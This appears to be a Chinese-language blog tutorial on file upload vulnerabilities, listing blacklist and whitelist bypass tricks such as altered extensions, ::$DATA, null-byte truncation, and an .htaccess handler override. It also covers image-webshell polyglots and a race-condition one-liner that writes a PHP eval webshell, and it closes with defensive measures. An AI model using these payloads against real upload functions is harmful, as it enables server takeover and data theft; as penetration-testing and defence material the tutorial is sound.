Web安全-文件上传漏洞-黑白名单及其它绕过思路(附思维导图)

什么是文件上传漏洞

文件上传漏洞是指应用程序未对用户上传的文件进行严格校验(如类型、后缀、内容、权限等),导致攻击者可上传恶意文件(如可执行脚本、木马程序)到服务器,进而通过访问恶意文件获取服务器权限、窃取数据或发起进一步攻击的安全缺陷,其核心风险在于恶意文件被服务器成功解析执行,常见于未做过滤或过滤逻辑存在漏洞的网站上传功能。

1.黑名单绕过

1.空格绕过

如:"1.php "

2.大小写绕过

如:1.phP

3.加点绕过

如:1.php.

4.::$DATA绕过

如:1.php::$DATA

5.复写绕过

如:1.pphphp

6.加一些字符绕过

如:1.phtml,1.pht,1.phps,1.php3,1.php4,1.php5,1.php3p等

6.htaccess绕过

对于apache中间件

<FilesMatch "as.png">setHandler application/x-httpd-php</FilesMatch>

.htaccess 绕过的核心是利用服务器配置缺陷、解析差异或请求篡改,常见思路包括通过文件名 / 路径篡改(如加特殊字符、路径遍历)、HTTP 请求头伪造(如改 X-Forwarded-For)、服务器解析规则漏洞(如 MultiViews 启用、解析优先级问题)、规则逻辑缺陷(如大小写混合绕过正则匹配)绕过后端访问限制,需注意该行为仅适用于合法授权的渗透测试,严禁未授权操作,且需结合目标服务器(Apache、Nginx 等)实际配置调整策略,现代安全防护工具也会拦截常见手段,合规场景下可通过针对性安全检查优化.htaccess 配置

2.白名单绕过

1.%00截断

php版本小于5.3.29

%00为结束符

先上传一个可上传文件,如1.png

利用bp修改url,如:1.php%00

2.0x00截断

0x00会被系统识别为结束符

利用bp修改16进制

先加空格,通过hex找到空格20,将其改为00

3.其它绕过方式

  1. 修改文件幻数绕过内容检测

使用16进制编辑器打开一个图片,在图片后面插入WebShell

或者cmd下执行:copy aaa.jpg/b+test.php/a shell.jpg

2.条件竞争

大量发包绕过文件删除

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

4.文件上传漏洞的防御

1.上传的目录设置为不可执行。只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件服务器本身也不会受到影响,因此这一点至关重要。

  1. 对文件后缀的判断中使用白名单的方式。

3.文件服务器和web服务器分离,也就是上传的文件单独存放到其他的服务器之中。

4.不需要返回文件路径的情况下,随机改写文件名。

相关推荐
用户9623779544813 小时前
DVWA 靶场实验报告 (High Level)
安全
炫饭第一名13 小时前
速通Canvas指北🦮——基础入门篇
前端·javascript·程序员
进击的尘埃15 小时前
Vue3 响应式原理:从 Proxy 到依赖收集,手撸一个迷你 reactivity
javascript
willow15 小时前
JavaScript数据类型整理1
javascript
LeeYaMaster15 小时前
20个例子掌握RxJS——第十一章实现 WebSocket 消息节流
javascript·angular.js
UIUV16 小时前
RAG技术学习笔记(含实操解析)
javascript·langchain·llm
数据智能老司机16 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机16 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
颜酱17 小时前
理解二叉树最近公共祖先(LCA):从基础到变种解析
javascript·后端·算法
用户9623779544818 小时前
DVWA 靶场实验报告 (Medium Level)
安全